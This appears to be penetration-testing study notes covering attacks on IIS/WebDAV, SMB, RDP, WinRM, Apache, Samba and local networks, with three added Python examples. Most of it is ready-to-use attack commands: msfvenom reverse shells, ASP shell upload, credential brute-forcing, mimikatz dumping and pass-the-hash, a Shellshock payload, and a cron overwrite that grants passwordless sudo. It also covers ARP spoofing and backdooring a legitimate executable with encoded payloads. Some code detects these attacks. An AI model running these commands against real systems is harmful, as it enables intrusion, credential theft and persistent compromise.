
Frequently Exploited Windows Services

Microsoft IIS
WebDAV
SMB/CIFS
RDP
WinRM

Microsoft IIS and WebDAV exploitation techniques

Tools: davtest, cadaver
nmap -sV -p 80 --script=http-enum $IP (enumerate the web server; lists /webdav/ if it is exposed)
hydra -L userlist -P passlist $IP http-get /webdav/ (brute-force WebDAV credentials)
davtest -auth bob:password_12121 -url http://$IP/webdav/ (authenticate and test which file types can be uploaded and executed)
cadaver http://$IP/webdav (interactive WebDAV client; use put to upload files)

Exploiting with Metasploit:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$Local_IP LPORT=4444 -f asp > payload.asp (create the reverse-shell payload with msfvenom)
Upload payload.asp to the WebDAV share with cadaver (put payload.asp), then request it in a browser or with curl so IIS executes it.
msfconsole > use exploit/multi/handler > set PAYLOAD windows/meterpreter/reverse_tcp > set LHOST $Local_IP > set LPORT 4444 > run (start the handler before requesting the payload)
Microsoft SMB exploitation techniques
User-level authentication (per-user credentials; the default on modern Windows)
Share-level authentication (one password per share; legacy)
Tools: PsExec (Sysinternals telnet replacement for remote command execution; Impacket's psexec.py reimplements it), Metasploit
psexec.py username:password@$IP cmd.exe (needs local-admin credentials and write access to ADMIN$)
nmap -sV -p 445 --script=smb-vuln-ms17-010 $IP (check for EternalBlue, MS17-010)
RDP exploitation techniques
Tools: Metasploit Framework, hydra
auxiliary/scanner/rdp/rdp_scanner (confirm RDP is listening and fingerprint it)
xfreerdp /u:username /p:password /v:$IP:$Port (connect with valid credentials)
BlueKeep (CVE-2019-0708) vulnerability: pre-authentication RCE in RDP on Windows 7 / Server 2008 R2 and older; Metasploit has both a scanner and an exploit module for it

WinRM exploitation techniques

Tools: crackmapexec, evil-winrm (gets an interactive shell on the target), Metasploit
crackmapexec winrm $IP -u username -p passwordlist (brute-force WinRM credentials; -p takes a single password or a wordlist)
crackmapexec winrm $IP -u username -p password -x command (execute a command on the target)
evil-winrm -u username -p password -i $IP (shell on the target; WinRM listens on 5985/5986)

Windows privilege escalation techniques

Kernel exploits
Tools: Windows-Exploit-Suggester, SecWiki windows-kernel-exploits, Metasploit
getuid, getprivs, getsystem (meterpreter: current user, its privileges, and the built-in attempt to become SYSTEM)
use post/multi/recon/local_exploit_suggester
set SESSION $num
run
UAC (User Account Control) bypass
Tools: UACME (Akagi)
pgrep explorer (find the PID of explorer.exe)
migrate $PID (move into a process running in the logged-on user's context)
net localgroup administrators (confirm the user is a local admin; a UAC bypass only elevates an admin running at medium integrity, it does nothing for a standard user)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$PORT -f exe > backdoor.exe (payload for UACME to launch elevated)
Access token impersonation
Impersonate-level token (usable on the local system only)
Delegate-level token (usable for authentication to remote systems as well, e.g. from interactive logons)
Required privileges: SeAssignPrimaryTokenPrivilege, SeCreateTokenPrivilege, SeImpersonatePrivilege
Tools: incognito (meterpreter extension)
load incognito
list_tokens -u
impersonate_token "USERNAME" (use the exact token name shown by list_tokens)

Windows credential dumping techniques

Unattended Windows Setup answer files often contain local account passwords, base64-encoded or in cleartext: C:\Windows\Panther\Unattend.xml, C:\Windows\Panther\Autounattend.xml
certutil -urlcache -f $URL $FILE (download a file from cmd)
search -f Unattend.xml (search the filesystem from meterpreter)
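Worked example (added here, not part of the original notes): what to do with an Unattend.xml once it is found. When <PlainText> is false, Windows Setup stores base64(UTF-16LE(password + "Password")), so a plain base64 decode leaves the literal suffix "Password" on the end. The answer file below is a constructed sample, not from a real host; the account names and passwords in it are assumptions for the demo.

```python
import base64
import xml.etree.ElementTree as ET

NS = "{urn:schemas-microsoft-com:unattend}"
SUFFIX = "Password"   # Windows Setup appends this before base64-encoding a password


def encode_unattend_password(plain: str) -> str:
    """Build the <Value> Setup writes when <PlainText> is false: base64(UTF-16LE(pw + 'Password'))."""
    return base64.b64encode((plain + SUFFIX).encode("utf-16-le")).decode("ascii")


def decode_unattend_password(value: str, plaintext: bool) -> str:
    """Recover the cleartext from a <Password> element, stripping the 'Password' suffix."""
    if plaintext:
        return value
    text = base64.b64decode(value).decode("utf-16-le")
    return text[:-len(SUFFIX)] if text.endswith(SUFFIX) else text


# Constructed sample answer file (not from a real machine): one encoded and one cleartext password.
SAMPLE_UNATTEND = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>{encode_unattend_password('Password123')}</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <LocalAccounts>
          <LocalAccount>
            <Password>
              <Value>Summer2024!</Value>
              <PlainText>true</PlainText>
            </Password>
            <Name>bob</Name>
            <Group>Administrators</Group>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""


def extract_credentials(xml_text: str) -> list:
    """Return (account, cleartext password, settings pass) for every password in the file."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    found = []
    for tag in ("Password", "AdministratorPassword"):
        for pw in root.iter(NS + tag):
            value = pw.findtext(NS + "Value")
            if value is None:
                continue
            plaintext = (pw.findtext(NS + "PlainText") or "false").strip().lower() == "true"
            owner = parents[pw]
            if tag == "AdministratorPassword":
                account = "Administrator"
            else:   # <AutoLogon> carries <Username>, <LocalAccount> carries <Name>
                account = owner.findtext(NS + "Username") or owner.findtext(NS + "Name") or "?"
            node = pw   # walk up to <settings pass="..."> for context
            while node is not None and node.tag != NS + "settings":
                node = parents.get(node)
            found.append((account, decode_unattend_password(value, plaintext),
                          node.get("pass") if node is not None else ""))
    return found


if __name__ == "__main__":
    for account, password, phase in extract_credentials(SAMPLE_UNATTEND):
        print(f"[{phase}] {account}: {password}")
```

Run it against a real file with extract_credentials(open(path, encoding="utf-8-sig").read()); the BOM-tolerant codec matters because Setup writes these files with a UTF-8 BOM.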
Dumping credentials with mimikatz
load kiwi (meterpreter's built-in mimikatz extension: creds_all, lsa_dump_sam, lsa_dump_secrets; needs an admin or SYSTEM session)
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe (alternatively upload the standalone binary, execute it, and run the following inside it)
privilege::debug (acquire SeDebugPrivilege; required before the dumps below)
lsadump::sam (NTLM hashes of local accounts from the SAM)
lsadump::secrets (LSA secrets, e.g. service account passwords)
sekurlsa::logonpasswords (credentials of logged-on users from LSASS memory)
Pass-the-Hash attacks
Dump NTLM hashes with kiwi or hashdump; NTLM authentication accepts the hash itself, so no cracking is needed
search smb psexec, then use exploit/windows/smb/psexec with SMBUser set to the account and SMBPass set to the LM:NTLM pair from the dump
Exploiting Linux Services
Frequently exploited Linux services: Apache web server, SSH, FTP, Samba

Exploiting Apache (Shellshock vulnerability, CVE-2014-6271)

nmap -sV $IP --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" (check a CGI script for Shellshock)
User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd' (header to send to the CGI script; the two echoes end the CGI response headers so the command output lands in the HTTP body)
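Worked example (added here, not from the original notes) showing both sides of the header above: how the request is assembled, and how to pick Shellshock attempts out of an Apache combined-format access log, which is the check a defender wants after the fact. The log lines are constructed for the demo; host, URI and command are assumptions.

```python
import re

# Before the CVE-2014-6271 fix, bash parsed any environment value beginning with "() {" as a
# function definition and executed whatever followed the closing "};". A CGI server copies
# request headers (User-Agent, Referer, Cookie, ...) into the environment, so a crafted
# header reaches bash. This pattern matches that function-definition prologue.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed access-log lines (not from a real server); lines 2 and 3 carry payloads
# in different headers.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:15:32 +0000] "GET /gettime.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [12/Mar/2024:10:16:01 +0000] "GET /gettime.cgi HTTP/1.1" 200 1832 "-" "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
10.0.0.9 - - [12/Mar/2024:10:16:05 +0000] "GET /gettime.cgi HTTP/1.1" 200 44 "() { :;}; /bin/bash -c 'id'" "Mozilla/5.0"
"""


def build_shellshock_request(host: str, uri: str, command: str) -> bytes:
    """Raw HTTP request delivering the payload in User-Agent, as the nmap script does.
    The two echoes emit the blank line that terminates the CGI response headers, so the
    command output is returned in the body instead of corrupting the response."""
    payload = f"() {{ :; }}; echo; echo; /bin/bash -c '{command}'"
    request = (
        f"GET {uri} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {payload}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return request.encode()


def is_shellshock_payload(value: str) -> bool:
    return bool(SHELLSHOCK_RE.search(value))


def injected_command(value: str) -> str:
    """Everything after the fake function body is what vulnerable bash executes."""
    m = SHELLSHOCK_RE.search(value)
    return value[m.end():].strip() if m else ""


def find_shellshock_attempts(log_text: str) -> list:
    """Scan combined-format log lines and report which field carried a payload."""
    hits = []
    for line in log_text.strip().splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue
        for field in ("request", "referer", "ua"):
            if is_shellshock_payload(m.group(field)):
                hits.append({"ip": m.group("ip"), "time": m.group("time"), "field": field,
                             "command": injected_command(m.group(field))})
    return hits


if __name__ == "__main__":
    print(build_shellshock_request("10.0.0.1", "/gettime.cgi", "cat /etc/passwd").decode())
    for hit in find_shellshock_attempts(SAMPLE_ACCESS_LOG):
        print(f"{hit['time']} {hit['ip']} via {hit['field']}: {hit['command']}")
```

Only headers Apache logs are visible here; a payload in Cookie or a custom header will not show up in the combined format, so a positive from this scan is proof of an attempt, a negative is not proof of absence.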
Exploiting the Linux Samba service
Tools: enum4linux, smbclient, hydra, smbmap
smbmap -H $IP -u username -p password (list shares and the permissions the account has on them)
smbclient -L $IP -U username (list shares)
enum4linux -a $IP (full enumeration: users, shares, OS, password policy)
Linux privilege escalation

Escalation with cron jobs

cd /
grep -rnw /usr -e "/home/student/message" (find the script that a root cron job runs and that references this file; check that it is writable by the current user)
printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > $CRON_SCRIPT (overwrite that writable script; when cron runs it as root, student gets passwordless sudo, then sudo su)
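Worked example (added here, not from the original notes) of the check behind the grep above, generalised to the whole system crontab: parse /etc/crontab-style entries and report every root job whose script is world-writable, or missing from a world-writable directory, which are the two conditions that let a low-privileged user plant the sudoers payload. The crontab and the directory tree are constructed for the demo; the root= parameter exists only so the check can run against a throwaway tree instead of the real filesystem.

```python
import os
import shlex
import stat
import tempfile


def parse_system_crontab(text: str) -> list:
    """Return (user, command) pairs from /etc/crontab or /etc/cron.d files.
    Skips comments, blank lines and VAR=value assignments; handles @reboot-style lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):
            fields = line.split(None, 2)          # @reboot user command
            if len(fields) == 3:
                jobs.append((fields[1], fields[2]))
            continue
        fields = line.split(None, 6)              # m h dom mon dow user command
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return jobs


def _world_writable(path: str) -> bool:
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def weak_cron_targets(jobs: list, root: str = "/") -> list:
    """For each absolute path in a job's command report the two classic privesc conditions:
    the script is world-writable, or it does not exist but its directory is world-writable
    (create the file and cron runs it). Non-path tokens such as flags are ignored."""
    findings = []
    for user, command in jobs:
        for token in shlex.split(command):
            if not token.startswith("/"):
                continue
            path = os.path.join(root, token.lstrip("/"))
            parent = os.path.dirname(path)
            if os.path.isfile(path) and _world_writable(path):
                findings.append((user, token, "world-writable script"))
            elif not os.path.exists(path) and os.path.isdir(parent) and _world_writable(parent):
                findings.append((user, token, "missing script in world-writable directory"))
    return findings


# Constructed /etc/crontab for the demo; copy.sh mirrors the lab script that touches /home/student/message.
SAMPLE_CRONTAB = """\
# constructed system crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * *   root  /usr/local/bin/copy.sh
*/5 * * * * root  /usr/bin/backup --quiet
@reboot     root  /opt/startup/init.sh
"""


def build_fixture() -> str:
    """Create a throwaway directory tree holding the files SAMPLE_CRONTAB references."""
    root = tempfile.mkdtemp()
    for sub in ("usr/local/bin", "usr/bin", "opt/startup"):
        os.makedirs(os.path.join(root, sub))
    copy_sh = os.path.join(root, "usr/local/bin/copy.sh")
    with open(copy_sh, "w") as f:
        f.write("#!/bin/bash\ncp /home/student/message /tmp/message\n")
    os.chmod(copy_sh, 0o777)                                  # the misconfiguration
    backup = os.path.join(root, "usr/bin/backup")
    with open(backup, "w") as f:
        f.write("#!/bin/sh\nexit 0\n")
    os.chmod(backup, 0o755)                                   # correct: only root can write
    os.chmod(os.path.join(root, "opt/startup"), 0o777)        # init.sh missing, directory writable
    return root


if __name__ == "__main__":
    fixture = build_fixture()
    for user, script, why in weak_cron_targets(parse_system_crontab(SAMPLE_CRONTAB), root=fixture):
        print(f"{user} runs {script}: {why}")
```

On a real target run weak_cron_targets(parse_system_crontab(open("/etc/crontab").read())) and repeat for each file in /etc/cron.d; per-user crontabs in /var/spool/cron have no user field and need the six-field variant.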
Network-based attacks
Types: ARP, DHCP, SMB, FTP, Telnet, SSH
nmap $IP/subnet -sn (host discovery without a port scan)
tshark
tshark -r $FILE -z io,phs -q (protocol hierarchy)
tshark -r $FILE -Y 'http' (filter HTTP traffic)
tshark -r $FILE -Y 'ip.src==$IP && ip.dst==$IP' (filter by source and destination IP)

tshark -r $FILE -Y 'http.request.method==GET' (filter GET requests)

tshark -r $FILE -Y 'http.request.method==GET' -T fields -e frame.time -e ip.src -e http.request.full_uri (print only the selected fields)
tshark -r $FILE -Y 'http contains password' (find requests carrying a password)
Other useful fields and filters: http.host, http.cookie, ip contains amazon.in, http.user_agent
ARP spoofing
echo 1 > /proc/sys/net/ipv4/ip_forward (forward the intercepted traffic so the victim keeps connectivity)
arpspoof -i eth1 -t 10.100.13.37 -r 10.100.13.36 (poison 10.100.13.37's ARP cache for 10.100.13.36 and, with -r, the reverse direction too)
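Worked example (added here, not from the original notes) of what arpspoof puts on the wire and how to detect it: the frame is an unsolicited ARP reply claiming the attacker's MAC for the host's IP, and a defender catches it by comparing each reply's IP-to-MAC claim against a trusted table (static ARP entries or DHCP leases). The IPs match the command above; the MAC addresses and the trusted table are constructed for the demo.

```python
import struct
from ipaddress import IPv4Address

ETH_P_ARP = 0x0806
ARP_REPLY = 2


def _mac(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def _mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet frame carrying an unsolicited ARP reply: 'sender_ip is at sender_mac'.
    arpspoof -t target -r host sends exactly this to the target every couple of seconds."""
    eth = _mac(target_mac) + _mac(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # Ethernet, IPv4, hlen, plen, op
           + _mac(sender_mac) + IPv4Address(sender_ip).packed
           + _mac(target_mac) + IPv4Address(target_ip).packed)
    return eth + arp


def parse_arp(frame: bytes):
    """Decode an Ethernet/ARP frame into a dict; None if the frame is not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    op = struct.unpack("!HHBBH", frame[14:22])[4]
    return {"op": op,
            "sender_mac": _mac_str(frame[22:28]), "sender_ip": str(IPv4Address(frame[28:32])),
            "target_mac": _mac_str(frame[32:38]), "target_ip": str(IPv4Address(frame[38:42]))}


def detect_arp_spoof(frames: list, trusted: dict) -> list:
    """Flag ARP replies whose IP->MAC claim contradicts the trusted table.
    Returns (ip, expected_mac, claimed_mac) tuples."""
    alerts = []
    for frame in frames:
        arp = parse_arp(frame)
        if not arp or arp["op"] != ARP_REPLY:
            continue
        expected = trusted.get(arp["sender_ip"])
        if expected and expected.lower() != arp["sender_mac"]:
            alerts.append((arp["sender_ip"], expected, arp["sender_mac"]))
    return alerts


# Constructed scenario: victim 10.100.13.37, host 10.100.13.36, attacker on the same segment.
VICTIM_MAC, HOST_MAC, ATTACKER_MAC = "52:54:00:aa:bb:37", "52:54:00:aa:bb:36", "de:ad:be:ef:00:01"
TRUSTED = {"10.100.13.36": HOST_MAC, "10.100.13.37": VICTIM_MAC}
SAMPLE_FRAMES = [
    build_arp_reply(HOST_MAC, "10.100.13.36", VICTIM_MAC, "10.100.13.37"),      # legitimate
    build_arp_reply(ATTACKER_MAC, "10.100.13.36", VICTIM_MAC, "10.100.13.37"),  # -t: poison the victim
    build_arp_reply(ATTACKER_MAC, "10.100.13.37", HOST_MAC, "10.100.13.36"),    # -r: poison the host
]

if __name__ == "__main__":
    for ip, expected, claimed in detect_arp_spoof(SAMPLE_FRAMES, TRUSTED):
        print(f"ARP spoof: {ip} expected {expected}, reply claims {claimed}")
```

Feeding real traffic in means reading raw frames from an AF_PACKET socket or a pcap; tshark -r $FILE -Y 'arp.opcode==2' -T fields -e arp.src.proto_ipv4 -e arp.src.hw_mac gives the same sender pairs for an offline capture.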
Wi-Fi traffic analysis

Importing nmap results into Metasploit

Run nmap with -oX to save the scan as an XML file.
db_import $filename
hosts
services
Metasploit auxiliary modules
run autoroute -s $SUBNET (pivot: route traffic for that subnet through the current session)
udp_sweep
search type:auxiliary name:ftp
http_version, http_header, robots_txt, dir_scanner, files_dir, http_login, apache_userdir_enum
mysql_enum, mysql_version, mysql_sql
ssh_enumusers
db_autopwn (removed from current Metasploit releases), analyze, vulns (match imported scan data against exploit modules and list known vulnerabilities)
load wmap, wmap_sites -a $IP
Generating payloads with msfvenom
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=$IP LPORT=$PORT -f exe > payload64.exe
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$PORT -f exe > payload86.exe
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$IP LPORT=$PORT -f elf > payload64
Encoding payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$PORT -e x86/shikata_ga_nai -f exe > encodex86.exe
-i 10 (10 encoding iterations; encoding defeats only simple signature matching, not modern AV)
Injecting a payload into a portable executable
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$PORT -e x86/shikata_ga_nai -i 10 -f exe -k -x $PathOfPE > encodex86.exe
-x $PathOfPE (template executable to inject into), -k (keep the original functionality of the PE; the payload runs in a separate thread)
Automating Metasploit with resource scripts
vim handler.rc
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $IP
set LPORT $PORT
run
(save)
msfconsole -r handler.rc
vim portscan.rc
use auxiliary/scanner/portscan/tcp
set RHOSTS $IP
run
(save)
msfconsole -r portscan.rc
resource $pathofscript (run a resource script from inside msfconsole)
